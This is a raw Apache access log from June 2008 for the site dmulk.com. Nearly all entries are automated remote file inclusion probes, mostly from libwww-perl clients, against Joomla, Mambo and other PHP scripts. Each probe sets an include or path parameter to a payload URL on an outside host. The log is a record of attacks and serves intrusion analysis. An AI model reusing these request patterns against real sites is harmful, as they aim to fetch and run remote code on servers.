211.239.161.10 - - [09/Jun/2008:09:12:12 -0700] "GET /logs//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.20.132 - - [09/Jun/2008:09:12:22 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/Editor/uploaded/img/.tnnac/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
70.84.20.132 - - [09/Jun/2008:09:12:22 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/Editor/uploaded/img/.tnnac/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:12:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0038.jpg HTTP/1.1" 200 10194 "-" "Googlebot-Image/1.0" "dmulk.com"
211.239.161.10 - - [09/Jun/2008:09:12:25 -0700] "GET /logs/access_080312.log//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:12:43 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:12:43 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:12:43 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.239.161.10 - - [09/Jun/2008:09:12:51 -0700] "GET /logs/access_080312.log//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.72.170 - - [09/Jun/2008:09:12:59 -0700] "GET /logs/access_080118.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [09/Jun/2008:09:12:59 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [09/Jun/2008:09:12:59 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:14:22 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:15:03 -0700] "GET /logs/access.log/index.php?basepath=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:15:03 -0700] "GET /logs/index.php?basepath=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [09/Jun/2008:09:15:04 -0700] "GET /logs/access_080429.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [09/Jun/2008:09:15:04 -0700] "GET /index.php?basepath=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 200 16859 "-" "libwww-perl/5.812" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:15:04 -0700] "GET /logs/access_080429.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:09:15:16 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:15:18 -0700] "GET /logs/access_080310.log/appserv/main.php?appserv_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:15:18 -0700] "GET /appserv/main.php?appserv_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:09:15:18 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 200 16939 "-" "libwww-perl/5.76" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:15:18 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:15:41 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:15:42 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:15:42 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:15:44 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:15:45 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:15:45 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.236.11 - - [09/Jun/2008:09:15:46 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:01 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:02 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:02 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:03 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:03 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:03 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:06 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:06 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:07 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:16:13 -0700] "GET /logs/access_080228.log/index.php?option=com_restaurante&task=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:16:17 -0700] "GET /index.php?option=com_restaurante&task=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 200 16883 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:18 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:16:18 -0700] "GET /logs/access_071230.log/appserv/main.php?appserv_root=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:18 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:18 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:16:18 -0700] "GET /logs/index.php?option=com_restaurante&task=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:16:20 -0700] "GET /logs/access_080429.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:09:16:24 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:24 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:09:16:24 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:09:16:24 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:25 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:09:16:25 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:16:25 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:16:31 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:16:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:16:33 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:16:57 -0700] "GET /logs/access_080429.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:17:06 -0700] "GET /logs/access.log/port.php?content=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:17:06 -0700] "GET /port.php?content=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:17:06 -0700] "GET /logs/port.php?content=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:17:06 -0700] "GET /logs/access_071201.log/port.php?content=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:09:17:12 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.120.73 - - [09/Jun/2008:09:17:22 -0700] "GET /logs/access_080212.log//class/class.dashboard_lms.php?where_framework=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [09/Jun/2008:09:17:22 -0700] "GET /logs/access_080212.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:17:22 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:17:23 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:17:24 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:17:24 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:17:27 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:17:29 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:17:29 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:17:29 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:17:32 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:17:32 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:17:32 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:17:34 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:17:43 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0050.jpg HTTP/1.1" 200 12586 "-" "Googlebot-Image/1.0" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:17:47 -0700] "GET /logs/access.log/index1.php?site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:17:47 -0700] "GET /index1.php?site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:17:47 -0700] "GET /logs/index1.php?site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:18:03 -0700] "GET /logs/access_080103.log/index1.php?site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:18:07 -0700] "GET /logs/index.php?option=com_restaurante&task=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:18:10 -0700] "GET /index.php?option=com_restaurante&task=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 200 16883 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:18:12 -0700] "GET /logs/access_080312.log//administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:20 -0700] "GET /logs/access_080118.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:21 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:21 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:23 -0700] "GET /logs/access_080118.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:23 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:23 -0700] "GET /logs/access_080118.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:23 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:23 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:24 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:25 -0700] "GET /logs/access_080118.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:25 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:25 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:26 -0700] "GET /logs/access_071230.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:26 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:27 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:30 -0700] "GET /logs/access_080118.log//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:31 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [09/Jun/2008:09:18:31 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:32 -0700] "GET /logs/access_071230.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:33 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:33 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:18:46 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:18:52 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:52 -0700] "GET /logs/access_071225.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:52 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:18:52 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:18:53 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:18:53 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:18:56 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:18:57 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:18:58 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:19:05 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:09:19:05 -0700] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.126.46.141 - - [09/Jun/2008:09:19:08 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 200 16953 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:19:09 -0700] "GET /logs/access_080109.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.236.180.100 - - [09/Jun/2008:09:19:12 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/Editor/uploaded/img/.tnnac/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
